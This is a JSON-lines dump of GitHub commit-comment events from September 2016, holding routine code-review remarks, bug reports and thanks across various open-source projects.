{"id":"4517490343","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"fredpinon/Fred"},"payload":{"comment":{"id":18901717,"position":16,"line":16,"path":"wk2/js_day1/ex3.js","commit_id":"a1b3f919cbf0b8bd7b2a42716b54019b939806f3","created_at":"2016-09-05T15:36:39Z","updated_at":"2016-09-05T15:36:39Z","body":"AWESOME"}},"created_at":"2016-09-05T15:36:39Z"}
{"id":"4517494744","type":"CommitCommentEvent","actor":{"login":"jamflux"},"repo":{"name":"ingbrzy/MA-XML-8.0-SPANISH"},"payload":{"comment":{"id":18901722,"position":null,"line":null,"path":null,"commit_id":"ae129d3b55fa569f1dc117b24e468118a5ed4b07","created_at":"2016-09-05T15:37:42Z","updated_at":"2016-09-05T15:37:42Z","body":"Ok, some new volunteers... Patience."}},"created_at":"2016-09-05T15:37:42Z"}
{"id":"4517496031","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901723,"position":25,"line":122,"path":"plugins/USBPrinting/USBPrinterOutputDeviceManager.py","commit_id":"66f773434fb18ed74281602cab2a9ecc4378f283","created_at":"2016-09-05T15:38:00Z","updated_at":"2016-09-05T15:38:00Z","body":"Shouldn't this be `file_name`?"}},"created_at":"2016-09-05T15:38:00Z"}
{"id":"4517496778","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901725,"position":44,"line":137,"path":"plugins/USBPrinting/USBPrinterOutputDeviceManager.py","commit_id":"66f773434fb18ed74281602cab2a9ecc4378f283","created_at":"2016-09-05T15:38:11Z","updated_at":"2016-09-05T15:38:11Z","body":"Shouldn't this be `file_name`?"}},"created_at":"2016-09-05T15:38:11Z"}
{"id":"4517497476","type":"CommitCommentEvent","actor":{"login":"friedmandavid"},"repo":{"name":"AlejandroMagual/spicedacademy"},"payload":{"comment":{"id":18901726,"position":null,"line":null,"path":null,"commit_id":"a9d273f26e2df59e81b35f34a047b33253687a5b","created_at":"2016-09-05T15:38:21Z","updated_at":"2016-09-05T15:38:21Z","body":"LGTM"}},"created_at":"2016-09-05T15:38:21Z"}
{"id":"4517498141","type":"CommitCommentEvent","actor":{"login":"zhangyangyu"},"repo":{"name":"tiran/cpython"},"payload":{"comment":{"id":18901728,"position":125,"line":804,"path":"Lib/ssl.py","commit_id":"75990d0e0e3f8439f3936797c0aacb1df3c0c74c","created_at":"2016-09-05T15:38:31Z","updated_at":"2016-09-05T15:38:31Z","body":"Since we have already got the `self._sslobj is not None` check, can you also add it here?"}},"created_at":"2016-09-05T15:38:31Z"}
{"id":"4517499100","type":"CommitCommentEvent","actor":{"login":"dnk777"},"repo":{"name":"dnk777/qfusion"},"payload":{"comment":{"id":18901729,"position":null,"line":null,"path":null,"commit_id":"465a9c3781c1a4f9a943ebde5c2834bc40934ce5","created_at":"2016-09-05T15:38:45Z","updated_at":"2016-09-05T15:38:45Z","body":"This is a mechanism of making bots aware of scripted weapon-like abilities (like throwing a cluster bomb). It is already used in CTF:T script that I have modified. It may itself look like a minor concern but I had a personal interest of supporting all CTF:T abilities from the bot side. All hardcoded Warsow weapons are builtin weapons. Script weapon definitions for a bot client may be retrieved via introduced AS functions. Bots take script weapons status into account for weapon/tactics selection. Bot aiming subsystem has been generalized for a generic weapon definition so aiming code for builtin and script weapons is the same. Bot view angles are adjusted for aiming of primary weapon (is it builtin or script one), where primary weapon is chosen by bot logic, secondary weapon (if any) may be activated simultaneously if adjusted look angles are suitable for firing a secondary weapon too.\r\n\r\nI agree that the AS bridge of the bot AI is awkward to some degree. It is a product of continuous experiments with the code, so now I should redo some parts of it. \r\n\r\nI think that moving AI script bridge from `g_ascript.cpp`, `g_as_gametypes.cpp` to `ai/ai_ascript.cpp` is a good idea. Old code tried do not expose AI definitions to game/script bridge code too: instead of complete definition of `ai_handle_t` an extern `ai_handle_size` has been provided to initialize the AS `Bot` class descripor. Should not the game script lifetime management just call some `AI_AS_Init()`, `AI_AS_Shutdown()`, the only things that are intended to be exposed to the game module itself?"}},"created_at":"2016-09-05T15:38:45Z"}
{"id":"4517500032","type":"CommitCommentEvent","actor":{"login":"thebigsmileXD"},"repo":{"name":"SalmonGER/StatsPE"},"payload":{"comment":{"id":18901731,"position":null,"line":null,"path":null,"commit_id":"8aa3d1ee4c5d2263c4b5015e868e3b6b0d7e8488","created_at":"2016-09-05T15:38:59Z","updated_at":"2016-09-05T15:38:59Z","body":"Robske, are you drunk?"}},"created_at":"2016-09-05T15:38:59Z"}
{"id":"4517501031","type":"CommitCommentEvent","actor":{"login":"aneesrana"},"repo":{"name":"aneesrana/anees-rana"},"payload":{"comment":{"id":18901734,"position":null,"line":null,"path":null,"commit_id":"929ff8d320cec3bdf8ce4977efb6fa18cc539152","created_at":"2016-09-05T15:39:14Z","updated_at":"2016-09-05T15:39:14Z","body":"[artofdatascience (1).pdf](https://github.com/aneesrana/anees-rana/files/455315/artofdatascience.1.pdf)\r\n"}},"created_at":"2016-09-05T15:39:14Z"}
{"id":"4517502789","type":"CommitCommentEvent","actor":{"login":"Volind"},"repo":{"name":"rowen92/cv"},"payload":{"comment":{"id":18901741,"position":98,"line":98,"path":"public/stylesheets/main.css","commit_id":"96de0361e1e52a5ac2c5acbab3f7a5f6fe9f7a30","created_at":"2016-09-05T15:39:39Z","updated_at":"2016-09-05T15:39:39Z","body":"And... What do you what to tell with this naming: li--padding-left? Is it BEM-style? If yes, please think twice."}},"created_at":"2016-09-05T15:39:39Z"}
{"id":"4517503037","type":"CommitCommentEvent","actor":{"login":"Volind"},"repo":{"name":"rowen92/cv"},"payload":{"comment":{"id":18901744,"position":33,"line":33,"path":"sass/main.scss","commit_id":"96de0361e1e52a5ac2c5acbab3f7a5f6fe9f7a30","created_at":"2016-09-05T15:39:43Z","updated_at":"2016-09-05T15:39:43Z","body":"Don't you think it's weird?! You are extending h4!"}},"created_at":"2016-09-05T15:39:43Z"}
{"id":"4517505267","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901747,"position":31,"line":105,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-05T15:40:19Z","updated_at":"2016-09-05T15:40:19Z","body":"Yep. That's by design. "}},"created_at":"2016-09-05T15:40:19Z"}
{"id":"4517506083","type":"CommitCommentEvent","actor":{"login":"aidylewis"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901751,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T15:40:30Z","updated_at":"2016-09-05T15:40:30Z","body":"Why should I be concerned about receiving? Isn't the status field only mandatory in responses? "}},"created_at":"2016-09-05T15:40:30Z"}
{"id":"4517508020","type":"CommitCommentEvent","actor":{"login":"Lukasa"},"repo":{"name":"aidylewis/hyper-h2"},"payload":{"comment":{"id":18901755,"position":14,"line":313,"path":"h2/utilities.py","commit_id":"03124fb35efd64a53f7c086bae3503502b9811dc","created_at":"2016-09-05T15:40:59Z","updated_at":"2016-09-05T15:40:59Z","body":"Sure, but h2 can be a server or a client. So we can both send and receive responses."}},"created_at":"2016-09-05T15:40:59Z"}
{"id":"4517508337","type":"CommitCommentEvent","actor":{"login":"Ghostkeeper"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901756,"position":13,"line":48,"path":"plugins/UltimakerMachineActions/UpgradeFirmwareMachineAction.qml","commit_id":"66f773434fb18ed74281602cab2a9ecc4378f283","created_at":"2016-09-05T15:41:04Z","updated_at":"2016-09-05T15:41:04Z","body":"I wonder if we really need to mention that firmware works.\r\nAlso, \"printers\" is not with a capital P, usually (unless you're in Germany)."}},"created_at":"2016-09-05T15:41:04Z"}
{"id":"4517508942","type":"CommitCommentEvent","actor":{"login":"Volind"},"repo":{"name":"rowen92/cv"},"payload":{"comment":{"id":18901759,"position":null,"line":null,"path":null,"commit_id":"96de0361e1e52a5ac2c5acbab3f7a5f6fe9f7a30","created_at":"2016-09-05T15:41:13Z","updated_at":"2016-09-05T15:41:13Z","body":"Where is BEM?"}},"created_at":"2016-09-05T15:41:13Z"}
{"id":"4517509548","type":"CommitCommentEvent","actor":{"login":"jef-n"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901762,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:41:21Z","updated_at":"2016-09-05T15:41:21Z","body":"QGIS uses \"User-Agent: Mozilla/5.0 QGIS/2.17.0\" "}},"created_at":"2016-09-05T15:41:21Z"}
{"id":"4517509573","type":"CommitCommentEvent","actor":{"login":"joshuaruesweg"},"repo":{"name":"WoltLab/WCF"},"payload":{"comment":{"id":18901763,"position":3,"line":3,"path":"wcfsetup/install/files/lib/system/package/plugin/AbstractXMLPackageInstallationPlugin.class.php","commit_id":"e0276d9dff7ab5d3dc4a76244d3e0ef25a9fcc66","created_at":"2016-09-05T15:41:22Z","updated_at":"2016-09-05T15:41:22Z","body":"superfluous import? "}},"created_at":"2016-09-05T15:41:22Z"}
{"id":"4517509712","type":"CommitCommentEvent","actor":{"login":"nallath"},"repo":{"name":"Ultimaker/Cura"},"payload":{"comment":{"id":18901765,"position":34,"line":108,"path":"cura/PlatformPhysics.py","commit_id":"4817dbe62ffef1b4ee9cc3e950e63be04e27be94","created_at":"2016-09-05T15:41:24Z","updated_at":"2016-09-05T15:41:24Z","body":"What's wrong with not doing it with a break? (apart from the checking it once too many) "}},"created_at":"2016-09-05T15:41:24Z"}
{"id":"4517509730","type":"CommitCommentEvent","actor":{"login":"noloader"},"repo":{"name":"weidai11/cryptopp"},"payload":{"comment":{"id":18901766,"position":null,"line":null,"path":null,"commit_id":"022c33a172e1b2625a9ebf7658566d399600913f","created_at":"2016-09-05T15:41:24Z","updated_at":"2016-09-05T15:41:24Z","body":"Also see [Issue 252: Rijndael Base::UncheckedSetKey and out-of-bounds read](http://github.com/weidai11/cryptopp/issues/252)."}},"created_at":"2016-09-05T15:41:24Z"}
{"id":"4517511238","type":"CommitCommentEvent","actor":{"login":"jiangxin"},"repo":{"name":"jiangxin/git"},"payload":{"comment":{"id":18901768,"position":null,"line":null,"path":null,"commit_id":"5c57d7622e3c7c685345f9736c4c924349a321dd","created_at":"2016-09-05T15:41:47Z","updated_at":"2016-09-05T15:41:47Z","body":"Thanks @tvvocold. Will update."}},"created_at":"2016-09-05T15:41:47Z"}
{"id":"4517511914","type":"CommitCommentEvent","actor":{"login":"Sharlikran"},"repo":{"name":"wrye-bash/wrye-bash"},"payload":{"comment":{"id":18901769,"position":104,"line":127,"path":"Mopy/bash/game/fallout4/constants.py","commit_id":"63e43096b032765deb15f5520710c80159f0e140","created_at":"2016-09-05T15:41:57Z","updated_at":"2016-09-05T15:41:57Z","body":"Any minor tweaks I have made would be in https://github.com/Sharlikran/wrye-bash/tree/utumno-lo-rc3.  I don't have time to comment on them or rebase any commits but feel free to browse if you wish."}},"created_at":"2016-09-05T15:41:57Z"}
{"id":"4517518030","type":"CommitCommentEvent","actor":{"login":"Bladewood"},"repo":{"name":"endless-sky/endless-sky"},"payload":{"comment":{"id":18901780,"position":null,"line":null,"path":null,"commit_id":"c1ef2c59529342f2c0866ec9f77459ec603c22ef","created_at":"2016-09-05T15:43:35Z","updated_at":"2016-09-05T15:43:35Z","body":"excellent. now escorting star queens to a wild and exotic planet 20 systems away is actually worthwhile."}},"created_at":"2016-09-05T15:43:35Z"}
{"id":"4517523654","type":"CommitCommentEvent","actor":{"login":"samybob1"},"repo":{"name":"lionng429/react-file-uploader"},"payload":{"comment":{"id":18901788,"position":98,"line":71,"path":"src/UploadHandler.js","commit_id":"1dc67af3c15c6109122f05f0dbc8e205dbcb1fd8","created_at":"2016-09-05T15:45:01Z","updated_at":"2016-09-05T15:45:01Z","body":"No, there is two warning.\r\n\r\n>Warning: Failed prop type: Required prop `upload` was not specified in ..."}},"created_at":"2016-09-05T15:45:01Z"}
{"id":"4517524038","type":"CommitCommentEvent","actor":{"login":"WikiaJenkins"},"repo":{"name":"Wikia/design-system"},"payload":{"comment":{"id":18901791,"position":null,"line":null,"path":null,"commit_id":"68207b2227986cdb20bea7bd6d0fddcd6d7034d2","created_at":"2016-09-05T15:45:09Z","updated_at":"2016-09-05T15:45:09Z","body":"Visual Regression Testing found a difference between new version and the baseline.\nCheck the diffs [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-pr-check/389/).\nAccept the new baseline [here](http://jenkins.wikia-prod:8080/job/design-system-reference-page-update-baseline/parambuild?branch=XW-1928)."}},"created_at":"2016-09-05T15:45:09Z"}
{"id":"4517528037","type":"CommitCommentEvent","actor":{"login":"jlindgren90"},"repo":{"name":"adplug/adplug"},"payload":{"comment":{"id":18901799,"position":5,"line":65,"path":"src/adtrack.cpp","commit_id":"65a5c82045003c6afd8e66babe123b577e49e0db","created_at":"2016-09-05T15:46:10Z","updated_at":"2016-09-05T15:46:10Z","body":"Is this the right fix?  Looks like it adds potential for call fp.close() on a null pointer."}},"created_at":"2016-09-05T15:46:10Z"}
{"id":"4517529831","type":"CommitCommentEvent","actor":{"login":"jrevels"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18901803,"position":null,"line":null,"path":null,"commit_id":"6bb08bfec20c5678a1147022ce3ccc18db94601d","created_at":"2016-09-05T15:46:36Z","updated_at":"2016-09-05T15:46:36Z","body":"@andreasnoack Any idea where the 30x regression in [these benchmarks](https://github.com/JuliaCI/BaseBenchmarks.jl/blob/master/src/array/subarray.jl#L2) might've come from between now and yesterday?"}},"created_at":"2016-09-05T15:46:36Z"}
{"id":"4517530597","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":18901804,"position":null,"line":null,"path":null,"commit_id":"844e4ef7c95aa2930fcb5dc76f9c16affc6b8770","created_at":"2016-09-05T15:46:48Z","updated_at":"2016-09-05T15:46:48Z","body":"@Stefano80 Sounds really interesting, Stefano. Good luck with it!\r\n@crunchyNYC What did you try so far? SPSA is not easy to setup/understand initially, but worked very well for SF, in general. CLOP is easier to setup, you can tune against a pool of engines (almost a must with CLOP), but requires a LOT of games to be played."}},"created_at":"2016-09-05T15:46:48Z"}
{"id":"4517531833","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18901806,"position":27,"line":24,"path":"app/services/import_feed_service.rb","commit_id":"874cfc7f295244d83d3806962911efb6fdb7173d","created_at":"2016-09-05T15:47:07Z","updated_at":"2016-09-05T15:47:07Z","body":":)"}},"created_at":"2016-09-05T15:47:07Z"}
{"id":"4517535582","type":"CommitCommentEvent","actor":{"login":"kcardona86"},"repo":{"name":"kcardona86/BOB-the-BIPED"},"payload":{"comment":{"id":18901808,"position":null,"line":null,"path":null,"commit_id":"45a65625344fa966ddaa334597b97dffc0c261a5","created_at":"2016-09-05T15:47:59Z","updated_at":"2016-09-05T15:47:59Z","body":"Hi this is BOB the Biped, the 3d file is not mine but from http://www.thingiverse.com/thing:43708\r\n\r\nThe code was originally made by me using the Arduino SDK, feel free to use it, although BOB does not bite, it is your responsibility that this project in any way does not harm or inflict damage of any sort. \r\n\r\nAs far as hardware, the biped uses a total of 4 Micro servos and a HR-SRF05 Ultrasonic sensor as his eyes, that make him moving forward in case there is an obstacle. \r\n\r\nThe code will make BOB walk and jump on every restart of the code, I suggest using at least 1000mA (1A) PSU for this project as the servos draw quite a few amps. \r\n\r\nComments and suggestions are always welcomed :-)"}},"created_at":"2016-09-05T15:47:59Z"}
{"id":"4517536822","type":"CommitCommentEvent","actor":{"login":"ukmadlz"},"repo":{"name":"ibm-cds-labs/6degrees-of-kevin-bacon"},"payload":{"comment":{"id":18901812,"position":null,"line":null,"path":null,"commit_id":"cf19316609e036ce780aa86f770feab6aa1d6673","created_at":"2016-09-05T15:48:17Z","updated_at":"2016-09-05T15:48:17Z","body":"Closes #3 "}},"created_at":"2016-09-05T15:48:17Z"}
{"id":"4517546169","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18901829,"position":5,"line":5,"path":"app/models/product.rb","commit_id":"b55e2141e1221e7c4a2d14c4efec0a4a0edcb656","created_at":"2016-09-05T15:50:33Z","updated_at":"2016-09-05T15:50:33Z","body":"Ah, get it now; the assumption was that an image url would start by `http(s)://`. Which means it would work if the images where concatenated with no separator or with whitespace, and not if they were concatenated with something else (say `;`)"}},"created_at":"2016-09-05T15:50:33Z"}
{"id":"4517548328","type":"CommitCommentEvent","actor":{"login":"frank-dittrich"},"repo":{"name":"magnumripper/JohnTheRipper"},"payload":{"comment":{"id":18901831,"position":61,"line":61,"path":"src/as400_sha1_fmt_plug.c","commit_id":"8cc2a2720f8770355c520eed2ed06ead623c1989","created_at":"2016-09-05T15:51:04Z","updated_at":"2016-09-05T15:51:04Z","body":"Apparently, AS/400 SSHA1 format supports non-ASCII characters. Can we get a sample hash generated on a real AS/400?"}},"created_at":"2016-09-05T15:51:04Z"}
{"id":"4517548767","type":"CommitCommentEvent","actor":{"login":"rlauture1"},"repo":{"name":"rlauture1/exercise1"},"payload":{"comment":{"id":18901833,"position":null,"line":null,"path":null,"commit_id":"8bf9e98de18f4785b3aa75e7f53fc25d782dfd2b","created_at":"2016-09-05T15:51:11Z","updated_at":"2016-09-05T15:51:11Z","body":"first changes"}},"created_at":"2016-09-05T15:51:11Z"}
{"id":"4517557680","type":"CommitCommentEvent","actor":{"login":"TaskClusterRobot"},"repo":{"name":"garbas/mozilla-releng"},"payload":{"comment":{"id":18901849,"position":null,"line":null,"path":null,"commit_id":"4a21c63d45263033e48c11b830ec7422b882899c","created_at":"2016-09-05T15:53:26Z","updated_at":"2016-09-05T15:53:26Z","body":"TaskCluster-GitHub: https://tools.taskcluster.net/task-graph-inspector/#H3RhjUhSRNWHSYBDvZwKFA"}},"created_at":"2016-09-05T15:53:26Z"}
{"id":"4517561576","type":"CommitCommentEvent","actor":{"login":"excalibur1234"},"repo":{"name":"excalibur1234/pacli-simple"},"payload":{"comment":{"id":18901860,"position":null,"line":null,"path":null,"commit_id":"800c45797d7ff1a3afb3279d51cf6d95e994ef9e","created_at":"2016-09-05T15:54:30Z","updated_at":"2016-09-05T15:54:30Z","body":"thanks for your tips.\r\n\r\nfixed in https://github.com/excalibur1234/pacli-simple/commit/7fdecf15836a0d602917e8f2a4fa8efb194d3d1a"}},"created_at":"2016-09-05T15:54:30Z"}
{"id":"4517562113","type":"CommitCommentEvent","actor":{"login":"victorporof"},"repo":{"name":"mozilla/tofino"},"payload":{"comment":{"id":18901863,"position":21,"line":21,"path":"app/ui/browser-australis/reducers/profile.js","commit_id":"b68065b0c035f7cc1c387eadf7714b84b81e11da","created_at":"2016-09-05T15:54:39Z","updated_at":"2016-09-05T15:54:39Z","body":"Not 100% sure if `autocompletions` should go on the profile model or the ui state model. Suggestions welcome."}},"created_at":"2016-09-05T15:54:39Z"}
{"id":"4517564220","type":"CommitCommentEvent","actor":{"login":"dira"},"repo":{"name":"Murzic/feed_manager"},"payload":{"comment":{"id":18901868,"position":8,"line":9,"path":"app/controllers/feeds_controller.rb","commit_id":"659465dea287f0f4c528e45a98e5ac96026d4dca","created_at":"2016-09-05T15:55:13Z","updated_at":"2016-09-05T15:55:13Z","body":"What would you recommend, if you were the code reviewer?"}},"created_at":"2016-09-05T15:55:13Z"}
{"id":"4517565143","type":"CommitCommentEvent","actor":{"login":"jakirkham"},"repo":{"name":"conda-forge/libhwloc-feedstock"},"payload":{"comment":{"id":18901874,"position":null,"line":null,"path":null,"commit_id":"f2e6ce14beeebfe3047f68af721c398fb293ed10","created_at":"2016-09-05T15:55:26Z","updated_at":"2016-09-05T15:55:26Z","body":"Those are encrypted. Yes they are suppose to be there."}},"created_at":"2016-09-05T15:55:26Z"}
{"id":"4517565709","type":"CommitCommentEvent","actor":{"login":"Pro"},"repo":{"name":"open62541/open62541"},"payload":{"comment":{"id":18901877,"position":null,"line":null,"path":null,"commit_id":"dfad8fa02f27a45b6d1ef1db8836d74b75cfdaa7","created_at":"2016-09-05T15:55:35Z","updated_at":"2016-09-05T15:55:35Z","body":"Unfortunately I could not completely follow your explanation @ichrispa (I still try to understand the whole setup of open62541). Anyways I still think that this define should not be in the header and should not be used. It's quite dangerous, because it may be valid for older NodeIDs, but definitely not for new ones and lead other developers into the believe that the Binary ID is always +2.\r\n\r\nAs far as I can see it, it's only used in here:\r\nhttps://github.com/open62541/open62541/blob/0.2/tools/pyUANamespace/ua_builtin_types.py#L499\r\nso mabe it's better to e.g., first parse the NodeIds.csv into some python datastructure/map before calling `printOpen62541CCode` (or within) and then use this to directly get the correct encoding NodeID? So you don't need to modify UA_DataType:\r\n```\r\n... + str(self.parent.dataType().target().id().i) + \"+ UA_ENCODINGOFFSET_BINARY);\"\r\n```\r\nshould then be something like\r\n```\r\n... + str(get_binary_offset_for_node(self.parent.dataType().target().id().i))+\");\"\r\n```\r\n\r\nAnd regarding the Travis and all tests passing:\r\nIsn't that the purpose of unit testing to find problems like this? There should be a check for exactly this case and then fail (and blame the comitter ;) )\r\n\r\nThat's just my opinion, but feel free to leave it as it is now."}},"created_at":"2016-09-05T15:55:35Z"}
{"id":"4517575657","type":"CommitCommentEvent","actor":{"login":"Komzpa"},"repo":{"name":"qgis/QGIS"},"payload":{"comment":{"id":18901906,"position":4,"line":250,"path":"src/app/qgsoptions.cpp","commit_id":"aa256b8c33343e834aae0755950ab891007b483c","created_at":"2016-09-05T15:58:19Z","updated_at":"2016-09-05T15:58:19Z","body":"@jef-n thanks! we'll continue investigation."}},"created_at":"2016-09-05T15:58:19Z"}
{"id":"4517581670","type":"CommitCommentEvent","actor":{"login":"nekosune"},"repo":{"name":"Thaumic-Tinkerer/ThaumicTinkerer"},"payload":{"comment":{"id":18901916,"position":null,"line":null,"path":null,"commit_id":"95b5a78b601843b751bf9b596dfaf140fd9fc262","created_at":"2016-09-05T15:59:56Z","updated_at":"2016-09-05T15:59:56Z","body":"Mostly? I was updating to the same version Thaumcrsft used, until I couuld test with later"}},"created_at":"2016-09-05T15:59:56Z"}
{"id":"4517581899","type":"CommitCommentEvent","actor":{"login":"Gillou68310"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18901917,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-05T16:00:00Z","updated_at":"2016-09-05T16:00:00Z","body":"> I hadn't even noticed that. I'm not sure what is triggering the sidebar to close for some of the activities but not the other. I'll look into that.\r\n\r\nThis is happening because mRefreshNeeded is set to true when selecting Library/Display/Touchscreen items.\r\n\r\nAlso I noticed another bug when you create/delete a profile from game setting (manage profiles), the profile won't appear in the list until you close and re-open the game preference activity.\r\n"}},"created_at":"2016-09-05T16:00:00Z"}
{"id":"4517583016","type":"CommitCommentEvent","actor":{"login":"MultHub"},"repo":{"name":"Ale32bit/sPhone-Mods"},"payload":{"comment":{"id":18901922,"position":null,"line":null,"path":null,"commit_id":"38ae76fde3dc75aada82b1cc0f15e9fcfc4e86ba","created_at":"2016-09-05T16:00:17Z","updated_at":"2016-09-05T16:00:17Z","body":"yes"}},"created_at":"2016-09-05T16:00:17Z"}
{"id":"4517585539","type":"CommitCommentEvent","actor":{"login":"ingenieroariel"},"repo":{"name":"cga-harvard/HHypermap"},"payload":{"comment":{"id":18901927,"position":7,"line":64,"path":"hypermap/aggregator/tasks.py","commit_id":"759f440f4c2350fcea2e408e9e2b88ec68f34f12","created_at":"2016-09-05T16:00:46Z","updated_at":"2016-09-05T16:00:46Z","body":"@JorgeMartinezG This was of accessing it works for HHypermap itself but is very painful for downstream projects like Exchange.\r\n\r\nI suggest testing if the setting exists before accessing it, and giving it a default value if it doesn't.\r\n\r\nFor example:  \r\n```getattr(settings, 'REGISTRY_HARVEST_SERVICES', False)```"}},"created_at":"2016-09-05T16:00:46Z"}
{"id":"4517590509","type":"CommitCommentEvent","actor":{"login":"ccrama"},"repo":{"name":"ccrama/Slide"},"payload":{"comment":{"id":18901936,"position":null,"line":null,"path":null,"commit_id":"8022521f1fb14d7c7824a6437676901e60e873ed","created_at":"2016-09-05T16:01:57Z","updated_at":"2016-09-05T16:01:57Z","body":"It's pretty hard to figure out how to get to offline mode settings"}},"created_at":"2016-09-05T16:01:57Z"}
{"id":"4517591672","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"FriendsOfREDAXO/tricks"},"payload":{"comment":{"id":18901938,"position":15,"line":56,"path":"ycom_protected_files.md","commit_id":"1027946c3cfe0485bd8f60cdb150f8bb5a1391c5","created_at":"2016-09-05T16:02:15Z","updated_at":"2016-09-05T16:02:15Z","body":"falls du den output buffer cleanen musst wg. dem header() aufruf unten, sollte es vllt mit ins IF rein?\r\n\r\nwas passiert/soll passieren wenn das file nicht exisitiert?"}},"created_at":"2016-09-05T16:02:15Z"}
{"id":"4517591915","type":"CommitCommentEvent","actor":{"login":"vtjnash"},"repo":{"name":"JuliaLang/julia"},"payload":{"comment":{"id":18901940,"position":null,"line":null,"path":null,"commit_id":"6bb08bfec20c5678a1147022ce3ccc18db94601d","created_at":"2016-09-05T16:02:18Z","updated_at":"2016-09-05T16:02:18Z","body":"Is looks like it is hitting the vectorize_1_arg depwarn (#17302): https://github.com/JuliaCI/BaseBenchmarkReports/blob/3187fb25cd8acd650603db622475ce74689919a6/daily_2016_9_5/logs/6bb08bfec20c5678a1147022ce3ccc18db94601d_primary.err#L126?"}},"created_at":"2016-09-05T16:02:18Z"}
{"id":"4517592115","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":18901941,"position":null,"line":null,"path":null,"commit_id":"16142b5d27d3cee3b325cba43f35ab4256056192","created_at":"2016-09-05T16:02:21Z","updated_at":"2016-09-05T16:02:21Z","body":"Not sure what you mean exactly but I've just tried with:\r\n\r\n````\r\n     * @param fullQuery the full Elastic Search query used to search for installs. For example:\r\n     *        <pre>{@code\r\n     *            {\r\n     *              \"query\" : {\r\n     *                \"term\": { \"distributionVersion\" : \"5.2\" }\r\n     *              }\r\n     *            }\r\n     *        }</pre>\r\n`````\r\n\r\n(which is what I was talking about from the beginning, see  https://github.com/xwiki/xwiki-commons/blob/0eedaf53cac460a3e4171d855a92d1adf31e87b0/xwiki-commons-tools/xwiki-commons-tool-enforcers/xwiki-commons-tool-enforcer-dependencies/src/main/java/org/xwiki/tool/enforcer/ValidateDependencyVersion.java#L40-L40 )\r\n\r\nand I don't have any error. Doclint works fine and javadoc generates good HTML.\r\n\r\nAnd I do have the latest version (I've done a git pull).\r\n\r\nI'm going to commit this since using `<code>` should really be avoided and `{@code}`should be used instead (again it allows not having to care about HTML-escaping characters)."}},"created_at":"2016-09-05T16:02:21Z"}
{"id":"4517595174","type":"CommitCommentEvent","actor":{"login":"fzurita"},"repo":{"name":"mupen64plus-ae/mupen64plus-ae"},"payload":{"comment":{"id":18901946,"position":null,"line":null,"path":null,"commit_id":"17b3cfbfe236438c529345a7509c3f9af6409a19","created_at":"2016-09-05T16:03:09Z","updated_at":"2016-09-05T16:03:09Z","body":"Yes, I did notice that. The list is not refreshed.\n\nOn Mon, Sep 5, 2016, 12:00 PM Gillou68310 <notifications@github.com> wrote:\n\n> I hadn't even noticed that. I'm not sure what is triggering the sidebar to\n> close for some of the activities but not the other. I'll look into that.\n>\n> This is happening because mRefreshNeeded is set to true when selecting\n> Library/Display/Touchscreen items.\n>\n> Also I noticed another bug when you create/delete a profile from game\n> setting (manage profiles), the profile won't appear in the list until you\n> close and re-open the game preference activity.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/mupen64plus-ae/mupen64plus-ae/commit/17b3cfbfe236438c529345a7509c3f9af6409a19#commitcomment-18901917>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALC490S056CN7Yt5PD6ZX-C4X8_Xtz5vks5qnDyBgaJpZM4Jh51Y>\n> .\n>\n"}},"created_at":"2016-09-05T16:03:09Z"}
{"id":"4517596207","type":"CommitCommentEvent","actor":{"login":"Sami32"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18901954,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-05T16:03:24Z","updated_at":"2016-09-05T16:03:24Z","body":"@atamariya It's now working for me :smile: \r\nSo if you want test it before i delete the codec part and push it ,if it working without that, i could know that it didn't only solved my issue.\r\n\r\nWhile testing with your PS3 set the `TranscodeAudioto441=true` in your renderer configuration, as i read that PS3 support it."}},"created_at":"2016-09-05T16:03:24Z"}
{"id":"4517597123","type":"CommitCommentEvent","actor":{"login":"inducer"},"repo":{"name":"conda-forge/libhwloc-feedstock"},"payload":{"comment":{"id":18901956,"position":null,"line":null,"path":null,"commit_id":"f2e6ce14beeebfe3047f68af721c398fb293ed10","created_at":"2016-09-05T16:03:36Z","updated_at":"2016-09-05T16:03:36Z","body":"Thanks for clarifying--and sorry for the noise!"}},"created_at":"2016-09-05T16:03:36Z"}
